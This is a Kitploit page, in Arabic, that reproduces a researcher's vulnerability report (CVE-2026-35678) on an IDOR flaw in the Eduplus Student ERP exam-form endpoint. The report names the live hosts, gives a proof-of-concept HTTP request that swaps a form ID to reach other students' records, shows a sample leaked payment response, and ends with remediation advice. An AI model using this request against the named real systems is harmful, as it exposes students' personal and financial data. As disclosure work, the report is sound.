Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-35678 — تقرير بحث تفصيلي حول ثغرة IDOR في نظام Eduplus Student ERP، بما في ذلك التحليل الفني، وإثبات المفهوم (PoC)، وتقييم الأثر، والتوصيات العلاجية. | Kitploit
أدوات/GitHubGitHub/sharma19d/cve-2026-35678
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

تقرير بحث تفصيلي حول ثغرة IDOR في نظام Eduplus Student ERP، بما في ذلك التحليل الفني، وإثبات المفهوم (PoC)، وتقييم الأثر، والتوصيات العلاجية.

عرض المستودع
19منذ 11 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تقرير بحث الثغرات: مرجع كائن مباشر غير آمن (IDOR) في جميع أنظمة Eduplus Student ERP

الباحث: Vinay Sharma

1. الملخص التنفيذي

يوثق هذا التقرير ثغرة أمنية عالية الخطورة تم تحديدها في منصة Eduplus Student ERP، وتحديداً في بوابة المتعلم للطلاب (learnerapi.pceterp.in). يعاني التطبيق من مرجع كائن مباشر غير آمن (IDOR) شامل في نقطة نهاية تقديم نموذج الامتحان، مما يسمح لأي مستخدم مصادق (طالب) باسترجاع البيانات الشخصية والمالية الحساسة لأي طالب آخر من خلال التلاعب بمعرفات النماذج.

تسمح هذه الثغرات بجمع بيانات واسع النطاق لسجلات الطلاب، بما في ذلك المعلومات الشخصية القابلة للتعريف (PII) وسجلات تدقيق المعاملات المالية التفصيلية.


2. تفاصيل الثغرة

  • المضيف المستهدف: learnerapi.pceterp.in, learner.zealerp.in, learner.despu.edu.in وغيرها
  • نقطة النهاية المتأثرة: POST /ExamForm/viewSubmitExamForm
  • أنواع الثغرات:
    • مرجع كائن مباشر غير آمن (IDOR) [CWE-639]
    • تشفير ضعيف (AES-ECB مع مفتاح ثابت) [CWE-327, CWE-798]
    • كشف البيانات الحساسة [CWE-312]
  • الخطورة: عالية (تقدير CVSS v3.1: 7.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

3. التحليل الفني

3.1 مرجع كائن مباشر غير آمن (IDOR)

تقع الثغرة في نقطة نهاية viewSubmitExamForm. يعتمد الخادم على معلمتين يوفرهما العميل لتحديد السجل المطلوب استرجاعه:

  1. نص الطلب: {"formid": "XXXXX"}
  2. ترويسة HTTP: Router-Path: /view-pcu-exam-form/XXXXX

بينما يجب أن يكون المستخدم مصادقاً، يفشل الخادم في التحقق مما إذا كان الطالب المصادق مخولاً لعرض البيانات المرتبطة بـ formid المطلوب. من خلال التكرار عبر المعرفات الرقمية، يمكن للمهاجم الوصول إلى سجلات الطلاب الآخرين.

4. إثبات المفهوم (PoC)

4.1 استغلال IDOR

يؤدي طلب POST قياسي إلى نقطة النهاية الضعيفة مع formid معدل إلى كشف بيانات الطلاب الحساسة.

الطلب:

POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (ترويسات المصادقة) ...

{"formid":"28984"}

الاستجابة (ملخص البيانات المسربة):

{
  "status": "200",
  "examFormname": "B.Tech - Sem VI - Regular",
  "receipt_no": "REC/2023/54321",
  "feespaiddate": "2023-10-15",
  "ispaymentdone": {
    "username": "[email protected]",
    "received_amount": "1500.0",
    "updation_ip_address": "103.x.x.x",
    "erp_transaction_id": "ERP_998877",
    "bank_transaction_id": "BANK_ABC123",
    "paymentgateway_transaction_id": "PG_XYZ789",
    "learner": {
      "id": "12345"
    }
  }
}
5 4 3 2 1

جارٍ رفع Idorpoc.mp4…


5. تقييم الأثر

يسمح الاستغلال الناجح لهذه الثغرة بما يلي:

  • كشف واسع النطاق للمعلومات الشخصية (PII): الوصول إلى الأسماء وعناوين البريد الإلكتروني ومعرفات الطلاب وعناوين IP الخاصة بتسجيل الدخول لجميع الطلاب.
  • خرق البيانات المالية: كشف سجل المعاملات ومعرفات البنوك ومراجع بوابات الدفع. هذه المعلومات حساسة للغاية ويمكن استخدامها للهندسة الاجتماعية المالية أو الاحتيال.
  • انتهاك خصوصية الأكاديمية: وصول غير مصرح به إلى نماذج الامتحانات وتعيينات المشرفين وحالات التقديم.

6. توصيات المعالجة

6.1 إصلاح التفويض (الأولوية: عالية)

  • تنفيذ فحوصات التفويض من جانب الخادم: يجب على الواجهة الخلفية التحقق من أن formid المطلوب ينتمي إلى learnerid المرتبط بالجلسة النشطة. لا تثق أبداً بمعلمات formid أو Router-Path دون التحقق من صحة رمز جلسة المصادقة.

6.3 التقوية العامة

  • تقليل مخرجات البيانات: تأكد من أن واجهة برمجة التطبيقات (API) تُرجع فقط الحقول الضرورية لعرض واجهة المستخدم المحددة. يجب إخفاء معرفات المعاملات الداخلية وعناوين IP ما لم تكن ضرورية تماماً لسير عمل المستخدم.
  • أمان الجلسة: راجع استخدام الترويسات المشفرة المخصصة لإدارة الجلسات وفكر في استخدام JWTs قياسية ومحصنة أو ملفات تعريف ارتباط آمنة HTTP-only.
تنزيل الأداة